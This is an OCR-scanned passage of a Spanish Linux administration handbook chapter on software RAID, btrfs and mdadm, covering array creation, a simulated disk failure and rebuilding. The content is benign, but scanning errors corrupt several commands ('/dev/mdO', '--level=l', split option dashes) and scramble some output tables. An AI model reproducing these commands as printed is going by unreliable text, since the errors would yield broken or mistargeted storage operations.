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RAID  y  LVM  322  Virtualizacion  343  Instalacion  automatizada  360  Monitorizacion  367 


Este  capitulo  vuelve  sobre  algunos  aspectos  queya  se  han  descripto  anteriormente  con  una  perspectiva 
diferente:  en  lugar  de  instalar  un  unico  equipo  vamos  a  estudiar  sistemas  de  despliegue  masivo;  en  lugar 
de  crear  volumenes  RAID  o  LVM  durante  la  instalacion,  vamos  a  aprender  a  hacerlo  a  mono  para  que 
posteriormente  podamos  revisar  nuestras  elecciones  iniciales.  Por  ultimo  veremos  herramientas  de 
monitorizacion  y  tecnicas  de  virtualizacion.  Como  consecuencia  de  lo  anterior,  este  capitulo  se  dirige  mas 
a  administradores  profesionales  y  no  tanto  a  personas  responsables  unicamente  de  su  red  domestica. 


12.1  RAID  y  LVM 


El  Capi'tulo  4:  «Instalacion»  pagina  52  presentaba  estas  tecnologfas  desde  el  punto  de  vista  del 
instalador  y  como  este  las  integra  para  hacer  sencillo  su  despliegue  desde  el  comienzo.  Despues 
de  la  instalacion  inicial,  un  administrador  debe  ser  capaz  de  gestionar  las  cambiantes  necesi- 
dades  de  espacio  sin  tener  que  recurrir  a  una  reinstalacion.  Por  lo  tanto  necesita  dominar  las 
herramientas  necesarias  para  manipular  volumenes  RAID  y  LVM. 

Tanto  RAID  como  LVM  son  tecnicas  para  abstraer  los  volumenes  montados  de  sus  correspon- 
dientes  dispositivos  fisicos  (discos  duros  reales  o  particiones  de  los  mismos).  El  primero  protege 
los  datos  contra  fallos  de  hardware  agregando  redundancia  mientras  que  el  segundo  hace  mas 
flexible  la  gestion  de  los  volumenes  y  los  independiza  del  tamano  real  de  los  discos  subyacentes. 
En  ambos  casos  se  crean  nuevos  dispositivos  de  bloques  en  el  sistema  que  pueden  ser  utiliza- 
dos  tanto  para  crear  sistemas  de  archivos  como  espacios  de  intercambio  sin  necesidad  de  que 
se  asocien  a  un  disco  fisico  concreto.  RAID  y  LVM  tienen  origenes  bastante  diferentes  pero  su 
funcionalidad  a  veces  se  solapa,  por  lo  que  a  menudo  se  mencionan  juntos. 


PERSPECTIVA 

Mientras  que  LVM  y  RAID  son  dos  subsistemas  diferenciados  del  nucleo  que  se  in- 

Btrfs  combina  LVM  y 
RAID 

terponen  entre  los  dispositivos  de  bloques  de  disco  y  sus  sistemas  de  archivos,  btrfs 
es  un  nuevo  sistema  de  archivos,  desarrollado  originalmente  por  Oracle,  que  combi¬ 
na  las  caracteristicas  de  LVM,  RAID  y  muchas  mas.  Es  funcional  en  su  mayor  parte 
y,  a  pesar  de  estar  todavia  etiquetado  como  «experimental»  porque  su  desarrollo 
aun  esta  incompleto  (algunas  caracteristicas  todavia  no  estan  implementadas),  se 
conocen  experiencas  de  uso  en  entornos  reales. 

•-  http://btrfs.wiki.kernel.org/ 

Entre  las  caracteristicas  mas  notables  esta  el  poder  tomar  una  instantanea  del  sis¬ 
tema  de  archivos  en  cualquier  momento.  Esta  copia  instantanea  no  utiliza  inicial- 
mente  espacio  en  el  disco,  y  solo  se  dupica  aquella  informacion  que  es  modificada 
en  alguna  de  las  copias.  Este  sistema  de  archivos  tambien  gestiona  de  forma  trans- 
parente  la  compresion  de  archivos  y  hace  sumas  de  verificacion  para  garantizar  la 
integridad  de  toda  la  informacion  almacenada. 

Tanto  en  el  caso  de  RAID  como  en  el  de  LVM,  el  nucleo  proporciona  un  archivo  de  dispositivo  de 
bloques  similar  a  los  que  corresponden  a  un  disco  duro  o  una  particion.  Cuando  una  aplicacion 
u  otra  parte  del  nucleo  necesita  acceder  a  un  bloque  de  estos  dispositivos,  el  subsistema  apro- 
piado  canaliza  el  bloque  a  la  capa  fisica  apropiada.  Dependiendo  de  la  configuracion  este  bloque 
podria  estar  almacenado  en  uno  o  varios  discos,  y  su  localizacion  puede  no  estar  directamente 
relacionada  con  la  ubicacion  del  bloque  en  el  dispositivo  logico. 


12.1.1.  RAID  por  software 

RAID  significa  coleccwn  redundante  de  discos  independientes  («Redundant  Array  of  Independent 
Disks»).  El  objetivo  de  este  sistema  es  evitar  perdida  de  datos  en  caso  que  falle  un  disco  duro. 
El  principio  general  es  bastante  simple:  se  almacenan  los  datos  en  varios  discos  fisicos  en  lugar 
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de  solo  uno,  con  un  nivel  de  redundancia  configurable.  Dependiendo  de  esta  cantidad  de  redun¬ 
dance,  y  aun  en  caso  de  fallo  inesperado  del  disco,  se  puede  reconstruir  los  datos  sin  perdida 
desde  los  discos  restantes. 


CULTURA 

l  Independiente  o 
economical 


La  letra  I  en  RAID  era  originalmente  inicial  de  economico  («inexpensive»)  debido 
a  que  RAID  permiti'a  un  aumento  drastico  en  la  seguridad  de  los  datos  sin  la  ne- 
cesidad  de  invertir  en  costosos  discos  de  alta  gama.  Sin  embargo,  probablemente 
debido  a  preocupaciones  de  imagen,  ahora  se  suele  considerar  que  es  inicial  de 
independiente ,  lo  que  no  tiene  el  sabor  amargo  de  implicar  mezquindad. 


Se  puede  implementar  RAID  tanto  con  hardware  dedicado  (modulos  RAID  integrados  en  las  tar- 
jetas  controladoras  SCSI  o  SATA)  o  por  abstraccion  de  software  (el  nucleo).  Ya  sea  por  hardware 
o  software,  un  sistema  RAID  con  suficiente  redundancia  puede  mantenerse  operativo  de  forma 
transparente  cuando  falle  un  disco;  las  capas  superiores  (las  aplicaciones)  inclusive  pueden  se- 
guir  accediendo  a  los  datos  a  pesar  del  fallo.  Por  supuesto,  este  «modo  degradado»  puede  tener 
un  impacto  en  el  rendimiento  y  se  reduce  la  reduncancia,  por  lo  que  otro  fallo  de  disco  puede 
llevar  a  la  perdida  de  datos.  En  la  practica  por  lo  tanto,  uno  intentara  estar  en  este  modo  degra- 
dado  solo  el  tiempo  que  tome  reemplazar  el  disco  fallado.  Una  vez  que  instale  el  nuevo  disco,  el 
sistema  RAID  puede  reconstruir  los  datos  necesarios  para  volver  a  un  modo  seguro.  Las  aplica¬ 
ciones  no  notaran  cambio  alguno,  ademas  de  la  posible  disminucion  en  la  velocidad  de  acceso, 
mientras  que  el  array  este  en  modo  degradado  o  durante  la  fase  de  reconstruccion. 

Cuando  se  implementa  RAID  con  hardware,  generalmente  se  configura  desde  la  herramienta  de 
gestion  del  BIOS  y  el  nucleo  tratara  el  array  RAID  como  un  solo  disco  que  funcionara  como  un 
disco  fisico  estandar,  aunque  el  nombre  del  dispositivo  podrfa  ser  diferente. 

En  este  libro  solo  nos  enfocaremos  en  RAID  por  software. 


Diferentes  niveles  de  RAID 

RAID  no  es  solo  un  sistema  sino  un  rango  de  sistemas  identificados  por  sus  niveles,  los  cuales  se 
diferencian  por  su  disposicion  y  la  cantidad  de  redundancia  que  proveen.  Mientras  mas  redun- 
dantes,  mas  a  prueba  de  fallos  seran  ya  que  el  sistema  podra  seguir  funcionando  con  mas  discos 
fallados.  Por  el  otro  lado,  el  espacio  utilizable  disminuye  dado  un  conjunto  de  discos;  visto  de 
otra  forma,  necesitara  mas  discos  para  almacenar  una  cantidad  de  datos  particular. 

RAID  lineal  Aun  cuando  el  subsistema  RAID  del  nucleo  permite  crear  «RAID  lineal»,  esto  no 
es  RAID  propiamente  ya  que  esta  configuracion  no  provee  redundancia  alguna.  El  nucleo 
simplemente  agrupa  varios  discos  de  punta  a  punta  y  provee  el  volumen  agrupado  como 
un  solo  disco  virtual  (un  dispositivo  de  bloque).  Esa  es  toda  su  funcion.  Rara  vez  se  utiliza 
unicamente  esta  configuracion  (revise  mas  adelante  las  excepciones),  especialmente  de¬ 
bido  a  que  la  falta  de  redundancia  significa  que  el  fallo  de  un  disco  hara  que  todo  el  grupo, 
y  por  lo  tanto  todos  los  datos,  no  esten  disponibles. 

RAID-0  Este  nivel  tampoco  provee  redundancia,  pero  los  discos  no  estan  simplemente  agrupa- 
dos  uno  despues  del  otro:  estan  divididos  en  tiras  («stripes»),  y  los  bloques  en  el  dispositivo 
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virtual  son  almacenados  en  tiras  de  discos  fisicos  alternados.  En  una  configuracion  RAID-0 
de  dos  discos,  por  ejemplo,  los  bloques  pares  del  dispositivo  virtual  seran  almacenados  en 
el  primer  disco  fisico  mientras  que  los  bloques  impares  estaran  en  el  segundo  disco  fisico. 

Este  sistema  no  intenta  aumentar  la  confiabilidad  ya  que  (como  en  el  caso  lineal)  se  com- 
promete  la  disponibilidad  de  todos  los  datos  tan  pronto  como  falle  un  disco,  pero  si  aumen- 
ta  el  rendimiento:  durante  el  acceso  secuencial  a  grandes  cantidades  de  datos  contiguos, 
el  nucleo  podra  leer  de  (o  escribir  a)  ambos  discos  en  paralelo,  lo  que  aumentara  la  tasa 
de  transferencia  de  datos.  Sin  embargo,  esta  disminuyendo  el  uso  de  RAID-0  en  favor  de 
LVM  (revise  mas  adelante). 

RAID-1  Este  nivel,  tambien  conocido  como  «espejado  RAID»  («mirroring»)  es  la  configuracion 
mas  simple  y  la  mas  utilizada.  En  su  forma  estandar,  utiliza  dos  discos  fisicos  del  mismo 
tamano  y  provee  un  volumen  logico  nuevamente  del  mismo  tamano.  Se  almacenan  los 
datos  de  forma  identica  en  ambos  discos,  de  ahi  el  apodo  «espejo»  («mirror»).  Cuando 
falla  un  disco,  los  datos  continuan  disponibles  en  el  otro.  Para  datos  realmente  criticos, 
obviamente,  RAID-1  puede  configurarse  con  mas  de  dos  discos,  con  un  impacto  directo  en 
la  relacion  entre  el  costo  del  hardware  y  el  espacio  disponible  para  datos  utiles. 


NOTA  Si  configura  en  espejo  dos  discos  de  diferentes  tamafios,  el  mas  grande  no 
Discos  y  tamanos  de  ser^  completamente  utilizado  ya  que  contendra  los  mismos  datos  que  el 
«cluster»  m^s  Paquefio  Y  nada  mas.  Por  lo  tanto,  el  espacio  util  que  provee  un  volu¬ 
men  RAID-1  es  el  tamano  del  menor  de  los  discos  en  el  array.  Esto  tambien 
aplica  a  volumenes  RAID  de  mayor  nivel  RAID,  aun  cuando  la  redundancia 
se  almacene  de  forma  diferente. 

Por  lo  tanto  es  importante,  cuando  configure  arrays  RAID  (a  excepcion  de 
RAID-0  y  «RAID  I j neal »)  solo  agrupar  discos  de  tamano  identico,  o  muy 
similares,  para  evitar  desperdiciar  recursos. 


NOTA  Los  niveles  RAID  que  incluyen  redundancia  permiten  asignar  a  un  array 
Discos  Iibres  m^s  discos  que  los  necesarios.  Los  discos  adicionales  son  utilizados  como 
repuestos  cuando  falla  alguno  de  los  discos  principals.  Por  ejemplo,  en  un 
espejo  de  dos  discos  mas  uno  libre,  si  falla  uno  de  los  primeros  discos  el  nu¬ 
cleo  automaticamente  (e  inmediatamente)  reconstruira  el  espejo  utilizando 
el  disco  libre  para  continuar  asegurando  la  redundancia  luego  del  tiempo 
de  reconstruccion.  Puede  utilizar  esta  caracteristica  como  otra  barrera  de 
seguridad  para  datos  criticos. 

Es  normal  preguntarse  porque  esto  es  mejor  que  simplemente  configurar  el 
espejo  con  tres  discos  desde  el  comienzo.  La  ventaja  de  la  configuracion  con 
un  «disco  I i b re »  es  que  puede  compartir  este  ultimo  entre  varios  volumenes 
RAID.  Por  ejemplo,  uno  puede  tener  tres  volumenes  en  espejo  asegurando 
redundancia  en  caso  que  falle  un  disco  con  solo  siete  discos  (tres  pares  mas 
un  disco  libre  compartido),  en  lugar  de  los  nueve  discos  que  necesitaria  para 
configurar  tres  trios  de  discos. 


Este  nivel  de  RAID,  aunque  costoso  (debido  a  que  solo  es  util  la  mitad  del  espacio  de  alma- 
cenamiento  en  el  mejor  de  los  casos)  es  muy  utilizado  en  la  practica.  Es  simple  de  entender 
y  permite  respaldos  muy  simples,  como  ambos  discos  tienen  el  mismo  contenido  puede 
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extraer  temporalmente  uno  de  ellos  sin  impactar  el  funcionamiento  del  sistema.  Usual- 
mente  aumenta  el  rendimiento  de  lectura  ya  que  el  nucleo  puede  leer  la  mitad  de  los  datos 
de  cada  disco  en  paralelo,  mientras  que  el  rendimiento  de  escritura  no  se  ve  afectado  muy 
seriamente.  En  el  caso  de  un  array  RAID-1  de  N  discos,  los  datos  continuaran  disponibles 
en  caso  que  fallen  N-l  discos. 

RAID-4  Este  nivel  de  RAID,  que  no  es  muy  utilizado,  utiliza  N  discos  para  almacenar  datos  utiles 
y  un  disco  extra  para  almacenar  informacion  de  redundancia.  Si  falla  este  disco,  el  sistema 
puede  reconstruir  su  contenido  de  los  otros  N.  Si  uno  de  los  N  discos  de  datos  falla,  la 
combinacion  de  los  demas  N-l  discos  junto  con  el  disco  de  «paridad»  contiene  suficiente 
informacion  para  reconstruir  los  datos  necesarios. 

RAID-4  no  es  demasiado  costoso  ya  que  solo  implica  un  aumento  de  uno-en-N  en  los  cos- 
tos  y  no  tiene  un  impacto  significativo  en  el  rendimiento  de  lectura,  pero  se  reduce  la 
velocidad  de  escritura.  Lo  que  es  mas,  debido  a  que  escribir  en  cualquier  disco  involucra 
escribir  en  el  disco  de  paridad  este  ultimo  recibira  muchas  mas  escrituras  que  los  demas 
y,  como  consecuencia,  podria  reducir  su  tiempo  de  vida  dramaticamente.  Los  datos  en  un 
array  RAID-4  estan  seguro  solo  contra  el  fallo  de  un  disco  (de  los  N+l). 

RAID-5  RAID-5  soluciona  el  problema  de  asimetria  de  RAID-4:  los  bloques  de  paridad  estan  dis- 
tribuidos  en  todos  los  N+l  discos,  ninguno  de  los  discos  tiene  un  rol  particular. 

El  rendimiento  de  lectura  y  escritura  es  identica  a  la  de  RAID-4.  Aqul  tambien  el  sistema 
continuara  su  funcionamiento  con  el  fallo  de  hasta  un  disco  (de  los  N+l),  pero  no  mas. 

RAID-6  Se  puede  considerar  a  RAID-6  como  una  extension  de  RAID-5,  donde  cada  serie  de  N 
bloques  poseen  dos  bloques  de  redundancia,  y  cada  serie  de  N+2  bloques  esta  distribuida 
en  N+2  discos. 

Este  nivel  de  RAID  es  ligeramente  mas  costoso  que  los  dos  anteriores,  pero  agrega  seguri- 
dad  adicional  ya  que  pueden  fallar  hasta  dos  discos  (de  N+2)  sin  comprometer  la  disponi- 
bilidad  de  los  datos.  Por  el  otro  lado,  las  operaciones  de  escritura  ahora  deben  escribir  un 
bloque  de  datos  y  dos  bloques  de  redundancia,  lo  que  lo  hace  aun  mas  lento. 

RAID-1+0  Estrictamente  hablando,  este  no  es  un  nivel  RAID  sino  la  combinacion  de  dos  agru- 
paciones  RAID.  Comience  con  2><N  discos,  configurelos  en  pares  de  N  volumenes  RAID-1; 
y  luego  agrupe  estos  N  volumenes  en  solo  uno,  ya  sea  con  «RAID  lineal»  o  (cada  vez  mas) 
LVM.  Este  ultimo  caso  va  mas  alia  de  RAID  puro,  pero  no  hay  problemas  con  ello. 

RAID-l+o  puede  sobrevivir  el  fallo  de  varios  discos,  hasta  N  en  el  array  de  2><N  antes  des- 
cripto,  siempre  que  continue  trabajando  al  menos  uno  de  los  discos  en  cada  par  RAID-1. 

YENDOMAsallA  Generalmente  se  considera  a  RAID-10  como  sinonimo  de  RAID-1+0,  pero 
algo  especi'fico  de  Linux  lo  hace  en  realidad  una  generalizacion.  Esta  con- 
figuracion  permite  un  sistema  en  el  que  cada  bloque  esta  almacenado  en 
dos  discos  diferentes,  aun  con  una  cantidad  impar  de  discos,  con  las  copias 
distribuidas  en  un  modelo  configurable. 

El  rendimiento  variara  dependiendo  del  modelo  de  reparto  y  el  nivel  de 
redundancia  que  seleccione,  asi  como  tambien  de  la  carga  en  el  volumen 
logico. 
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Obviamente,  seleccionara  el  nivel  RAID  segun  las  limitaciones  y  requisites  de  cada  aplicacion. 
Sepa  que  un  mismo  equipo  puede  tener  varios  arrays  RAID  distintos  con  diferentes  configura- 
ciones. 


Configuration  de  RAID 

Para  configurar  un  volumen  RAID  necesitara  el  paquete  mdamd :  este  provee  el  programa  mdadm, 
que  permite  crear  y  modificar  arrays  RAID,  asi  como  tambien  scripts  y  herramientas  que  lo  in- 
tegran  al  resto  del  sistema,  incluyendo  el  sistema  de  monitorizacion. 

Nuestro  ejemplo  sera  un  servidor  con  una  cantidad  de  discos,  algunos  que  ya  estan  utilizados,y 
el  resto  se  encuentran  disponibles  para  configurar  RAID.  Inicialmente  tendremos  los  siguientes 
discos  y  particiones: 

■  el  disco  sdb,  de  4  GB,  completamente  disponible; 

■  el  disco  sdc,  de  4  GB,  tambien  completamente  disponible; 

■  en  el  disco  sdd  hay  disponible  una  unica  particion  sdd2  (de  alrededor  de  4  GB); 

■  finalmente,  un  disco  sde,  tambien  de  4  GB,  completamente  disponible. 


NOTA 

El  archivo  /proc/mdstat  enumera  los  volumenes  existentes  y  sus  estados.  Cuando 

Identificacion  de 

cree  volumenes  RAID,  debe  tener  cuidado  de  no  nombrarlos  igual  a  algun  volumen 

volumenes  RAID 

existente. 

existentes 

Utilizaremos  estos  elementos  fisicos  para  crear  dos  volumenes,  un  RAID-0  y  un  espejo  (RAID-l). 
Comencemos  con  el  volumen  RAID-0: 


#  mdadm  --create  /dev/mdO  --level=0  -  - raid-devices=2  /dev/sdb  /dev/sdc 

mdadm:  Defaulting  to  version  1.2  metadata 
mdadm:  array  /dev/md0  started. 

#  mdadm  --query  /dev/mdO 

/dev/mdQ:  8.00GiB  raid0  2  devices,  0  spares.  Use  mdadm  --detail  for  more  detail. 

#  mdadm  --detail  /dev/mdO 

/dev/md0 : 


Version 

1.2 

Creation  Time 

Wed  May  6  09:24:34  2015 

Raid  Level 

raid0 

Array  Size 

8387584  (8.00  GiB  8.59  GB) 

Raid  Devices 

2 

Total  Devices 

2 

Persistence 

Superblock  is  persistent 

Update  Time 

Wed  May  6  09:24:34  2015 

State 

clean 

Active  Devices 

2 

Working  Devices 

2 

Failed  Devices 

0 
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Spare  Devices  :  0 


Chunk  Size  :  512K 

Name  :  mirwiz:0  (local  to  host  mirwiz) 
UUID  :  bb085b35 : 28e821bd : 20d697c9 : 650152bb 


Events  :  0 


Number 

Major 

Minor 

RaidDevice 

State 

0 

8 

16 

0 

active 

sync 

/dev/sdb 

1 

#  mkfs.ext4 

8 

/dev/mdO 

32 

1 

active 

sync 

/dev/sdc 

mke2f s  1.42.12  (29-Aug-2014) 

Creating  filesystem  with  2095104  4k  blocks  and  524288  inodes 
Filesystem  UUID:  fff08295-bede-41a9-9c6a-8c7580e520a6 
Superblock  backups  stored  on  blocks: 

32768,  98304,  163840,  229376,  294912,  819200,  884736,  1605632 

Allocating  group  tables:  done 
Writing  inode  tables:  done 
Creating  journal  (32768  blocks):  done 

Writing  superblocks  and  filesystem  accounting  information:  done 

#  mkdir  /srv/raid-0 

#  mount  /dev/mdO  /srv/raid-0 

#  df  -h  /srv/raid-0 

Filesystem  Size  Used  Avail  Use%  Mounted  on 

/dev/md0  7.9G  18M  7.4G  1%  /srv/raid-0 

La  orden  mdadm  -  -  create  necesita  varios  parametros:  el  nombre  del  volumen  a  crear  (/dev/ 
md*,  donde  MD  es  acronimo  de  multiples  dispositivos  —  «Multiple  Device»),  el  nivel  RAID,  la  canti- 
dad  de  discos  (que  es  obligatorio  a  pesar  de  que  sea  solo  importante  con  RAID-1  y  superior),  y  los 
dispositivos  fisicos  a  utilizar.  Una  vez  que  creo  el  dispositivo,  podemos  utilizarlo  como  si  fuese 
una  particion  normal,  crear  un  sistema  de  archivos  en  el,  montarlo,  etc.  Sepa  que  el  que  creara- 
mos  un  volumen  RAID-0  como  md0  es  solo  una  coincidencia,  la  numeracion  del  array  no  tiene 
correlacion  alguna  con  la  cantidad  de  redundancia  elegida.  Tambien  es  posible  crear  arrays  RAID 
con  nombre  si  se  proveen  los  parametros  correctos  a  mdadm,  como  /dev/md/linea  r  en  lugar  de 
/dev/mdO. 

Crear  un  RAID-1  es  similar,  las  diferencias  solo  son  notables  luego: 

#  mdadm  --create  /dev/mdl  --level=l  -  - raid-devices=2  /dev/sdd2  /dev/sde 

mdadm:  Note:  this  array  has  metadata  at  the  start  and 

may  not  be  suitable  as  a  boot  device.  If  you  plan  to 
store  '/boot'  on  this  device  please  ensure  that 
your  boot-loader  understands  md/vl.x  metadata,  or  use 
- -metadata=0 . 90 

mdadm:  largest  drive  (/dev/sdd2)  exceeds  size  (4192192K)  by  more  than  1% 

Continue  creating  array?  y 

mdadm:  Defaulting  to  version  1.2  metadata 
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mdadm:  array  /dev/mdl  started. 

#  mdadm  --query  /dev/mdl 

/dev/mdl:  4.00GiB  raidl  2  devices,  0  spares.  Use  mdadm  --detail  for  more  detail. 

#  mdadm  --detail  /dev/mdl 

/dev/mdl : 

Version  :  1.2 

Creation  Time  :  Wed  May  6  09:30:19  2015 
Raid  Level  :  raidl 

Array  Size  :  4192192  (4.00  GiB  4.29  GB) 

Used  Dev  Size  :  4192192  (4.00  GiB  4.29  GB) 

Raid  Devices  :  2 

Total  Devices  :  2 

Persistence  :  Superblock  is  persistent 

Update  Time  :  Wed  May  6  09:30:40  2015 
State  :  clean,  resyncing  (PENDING) 

Active  Devices  :  2 

Working  Devices  :  2 

Failed  Devices  :  0 

Spare  Devices  :  0 

Name  :  mirwiz:l  (local  to  host  mirwiz) 

UUID  :  6ec558ca : 0c2c04a0 : 19bca283 : 95f 67464 
Events  :  0 

Number  Major  Minor  RaidDevice  State 

0  8  50  0  active  sync  /dev/sdd2 

1  8  64  1  active  sync  /dev/sde 

#  mdadm  --detail  /dev/mdl 

/dev/mdl : 

[-] 

State  :  clean 

(...] 

SUGERENCIA  Como  muestra  nuestro  ejemplo,  puede  construir  dispositivos  RAID  con  particiones 
RAID  discos  y  de  discos,  no  necesita  discos  completos. 

particiones 

Son  necesarios  algunos  comentarios.  Primero,  mdadm  esta  al  tanto  que  los  elementos  fi'sicos  tie- 
ne  diferentes  tamanos;  se  necesita  confirmar  ya  que  esto  implicara  que  perdera  espacio  en  el 
elemento  mas  grande. 

Lo  que  es  mas  importante,  revise  el  estado  del  espejo.  El  estado  normal  de  un  espejo  RAID  es  que 
ambos  discos  tengan  el  mismo  contenido.  Sin  embargo,  nada  garantiza  que  este  sea  el  caso  cuan- 
do  se  crea  el  volumen.  Por  lo  tanto,  el  subsistema  RAID  dara  esta  garantfa  por  su  cuenta  y,  tan 
pronto  como  se  crea  el  dispositivo  RAID,  habra  una  fase  de  sincronizacion.  Luego  de  un  tiempo 
(cuanto  exactamente  dependera  del  tamano  de  los  discos...),  el  array  RAID  cambiara  al  estado 
«active»  (activo)  o  «clean»  (limpio).  Sepa  que  durante  esta  fase  de  reconstruccion  el  espejo  se 
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encuentra  en  modo  degradado  y  no  se  asegura  redundancia.  Si  falla  un  disco  durante  esta  ven- 
tana  de  riesgo  podra  perder  toda  la  informacion.  Sin  embargo,  rara  vez  se  almacenan  grandes 
cantidades  de  datos  crfticos  en  un  array  RAID  creado  recientemente  antes  de  su  sincronizacion 
inicial.  Sepa  que  aun  en  modo  degradado  puede  utilizar  /dev/mdl  y  puede  crear  en  el  un  sistema 
de  archivos  asi  como  tambien  copiar  datos. 


SUGERENCIA 

Inicio  de  un  espejo  en 
modo  degradado 


A  veces  no  se  encuentran  inmediatamente  disponibles  dos  discos  cuando  uno  desea 
iniciar  un  espejo  RAID-1,  por  ejemplo  porque  uno  de  los  discos  que  uno  planea 
utilizar  esta  siendo  utilizado  y  contiene  los  datos  que  uno  quiere  almacenar  en 
el  array.  En  estas  situaciones,  es  posible  crear  intencionalmente  un  array  RAID-1 
degradado  si  se  utiliza  missing  en  lugar  del  archivo  del  dispositivo  como  uno  de 
los  parametros  de  mdadm.  Una  vez  que  copio  los  datos  al  «espejo»,  puede  agregar 
el  disco  antiguo  al  array.  Luego  ocurrira  la  fase  de  sincronizacion,  proveyendo  la 
redundancia  que  deseabamos  en  primer  lugar. 


SUGERENCIA 

Configuracion  de  un 
espejo  sin  sincronizacion 


Usualmente  creara  volumenes  RAID-1  para  ser  utilizados  como  un  disco  nuevo, 
generalmente  considerados  en  bianco.  El  contenido  inicial  del  disco  no  es  realmente 
relevante,  ya  que  uno  solo  necesita  saber  que  se  podran  acceder  luego  a  los  datos 
escritos  luego  que  creamos  el  volumen,  en  particular:  el  sistema  de  archivos. 


Por  lo  tanto,  uno  podri'a  preguntarse  el  sentido  de  sincronizar  ambos  discos  al  mo- 
mento  de  crearlo.  ^Porque  importa  si  el  contenido  es  identico  en  las  zonas  del  vo¬ 
lumen  que  sabemos  solo  seran  accedidas  luego  que  escribamos  en  ellas? 

Afortunadamente,  puede  evitar  esta  fase  de  sincronizacion  con  la  opcion  -  -  assume - 
clean  de  mdadm.  Sin  embargo,  esta  opcion  puede  llevar  a  sorpresas  en  casos  en  el 
que  se  lean  los  datos  iniciales  (por  ejemplo,  si  ya  existe  un  sistema  de  archivos  en 
los  discos  fisicos),  lo  que  explica  porque  no  es  activada  de  forma  predeterminada. 


Veamos  ahora  que  sucede  cuando  falla  uno  de  los  elementos  del  array  RAID-1,  mdadm,  su  opcion 
—fail  en  particular,  permite  simular  tal  fallo: 


#  mdadm  /dev/mdl  --fail  /dev/sde 
mdadm:  set  /dev/sde  faulty  in  /dev/mdl 

#  mdadm  --detail  /dev/mdl 

/dev/mdl : 


[...] 

Update  Time 
State 
Active  Devices 
Working  Devices 
Failed  Devices 
Spare  Devices 


Wed  May  6  09:39:39  2015 
clean,  degraded 
1 
1 
1 
0 


Name  :  mirwiz:l  (local  to  host  mirwiz) 
UUID  :  6ec558ca : 0c2c04a0 : 19bca283 : 95f 67464 
Events  :  19 


Capi'tulo  12  —  Administracion  avanzada 


329 


Number  Major  Minor  RaidDevice  State 

0  8  50  0  active  sync  /dev/sdd2 

2002  removed 

1  8  64  -  faulty  /dev/sde 

El  contenido  del  volumen  continua  accesible  (y,  si  esta  montado,  las  aplicaciones  no  lo  notaran), 
pero  ya  no  se  asegura  la  seguridad  de  los  datos:  en  caso  que  falle  el  disco  sdd,  perdera  los  datos. 
Deseamos  evitar  este  riesgo,  por  lo  que  reemplazaremos  el  disco  fallido  con  uno  nuevo,  sdf : 

#  mdadm  /dev/mdl  --add  /dev/sdf 
mdadm:  added  /dev/sdf 

#  mdadm  --detail  /dev/mdl 

/dev/mdl : 

[-] 

Raid  Devices  :  2 
Total  Devices  :  3 

Persistence  :  Superblock  is  persistent 


Update  Time 

Wed 

May 

6  09:48:49  2015 

State 

clean,  degraded,  recovering 

Active  Devices 

1 

Working  Devices 

2 

Failed  Devices 

1 

Spare  Devices 

1 

Rebuild  Status 

28% 

complete 

Name 

mirwiz : 1 

(local  to  host  mirwiz) 

UUID 

6ec558ca 

0c2c04a0 : 19bca283 : 95f 67464 

Events 

26 

Number  Major 

Minor 

RaidDevice  State 

0  8 

50 

0  active  sync  /dev/sdd2 

2  8 

80 

1  spare  rebuilding  /dev/sdf 

1  8 

64 

faulty  /dev/sde 

#  [...] 

r  i 

L  — J 

#  mdadm  --detail 

/dev/mdl 

/dev/mdl : 

r  i 

L-J 

Update  Time 

Wed 

May 

6  09:49:08  2015 

State 

clean 

Active  Devices 

2 

Working  Devices 

2 

Failed  Devices 

1 

Spare  Devices 

0 
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Name  : 

mirwiz : 1 

(local 

to  host  mirwiz) 

UUID  : 

6ec558ca 

0c2c04a0 

: 19bca283:95f 67464 

Events  : 

41 

Number  Major 

Minor 

RaidDevice  State 

0  8 

50 

0 

active 

sync 

/dev/sdd2 

2  8 

80 

1 

active 

sync 

/dev/sdf 

1  8 

64 

. 

faulty 

/dev/sde 

Nuevamente,  el  nucleo  automaticamente  inicia  una  fase  de  reconstruction  durante  la  que  el 
volumen,  aunque  continua  disponible,  se  encuentra  en  modo  degradado.  Una  vez  finalizada  la 
reconstruccion,  el  array  RAID  volvera  a  estado  normal.  Uno  puede  indicarle  al  sistema  que  eli- 
minara  el  disco  sde  del  array,  para  obtener  un  espejo  RAID  clasico  en  dos  discos: 

#  mdadm  /dev/mdl  --remove  /dev/sde 
mdadm:  hot  removed  /dev/sde  from  /dev/mdl 

#  mdadm  --detail  /dev/mdl 
/dev/mdl : 

[...] 

Number  Major  Minor  RaidDevice  State 

0  8  50  0  active  sync  /dev/sdd2 

2  8  80  1  active  sync  /dev/sdf 

De  alii  en  adelante,  puede  quitar  fisicamente  el  dispositivo  la  proxima  vez  que  se  apague  el  ser- 
vidor,  o  inclusive  quitarlo  en  caliente  si  la  configuracion  del  hardware  lo  permite.  Tales  configu- 
raciones  incluyen  algunos  controladores  SCSI,  la  mayoria  de  los  discos  SATA  y  discos  externos 
USB  o  Firewire. 

Respaldos  de  la  configuracion 

La  mayoria  de  los  metadatas  de  los  volumenes  RAID  se  almacenan  directamente  en  los  discos 
que  componen  dichos  arrays,  de  esa  forma  el  nucleo  puede  detectar  el  array  y  sus  componentes 
y  ensamblarlos  automaticamente  cuando  inicia  el  sistema.  Sin  embargo,  se  recomienda  respal- 
dar  esta  configuracion  ya  que  esta  deteccion  no  es  infalible  y,  como  no  podia  ser  de  otra  forma, 
fallara  precisamente  en  las  circunstancias  mas  sensibles.  En  nuestro  ejemplo,  si  el  fallo  del  disco 
sde  hubiese  sido  real  (en  lugar  de  similada)  y  se  hubiese  reiniciado  el  sistema  sin  quitar  el  disco 
sde,  este  podria  ser  utilizado  nuevamente  debido  a  haber  sido  probado  durante  el  reinicio.  El 
nucleo  entonces  tendria  tres  elementos  fisicos,  cada  uno  de  los  cuales  indica  poseer  la  mitad  del 
mismo  volumen  RAID.  Otra  fuente  de  confusion  es  cuando  se  consolidan  en  un  servidor  volume¬ 
nes  RAID  de  dos  servidores.  Si  los  arrays  funcionaban  normalmente  antes  de  quitar  los  discos, 
el  nucleo  podra  detectarlos  y  reconstruir  los  pares  correctamente;  pero  si  los  discos  mudados 
se  encontraban  agrupados  como  md  1  en  el  antiguo  servidor  pero  el  nuevo  servidor  ya  posee  un 
grupo  mdl,  se  modificara  el  nombre  de  uno  de  los  espejos. 

Por  lo  tanto  es  importante  respaldar  la  configuracion,  aunque  sea  tan  solo  como  referencia.  La 
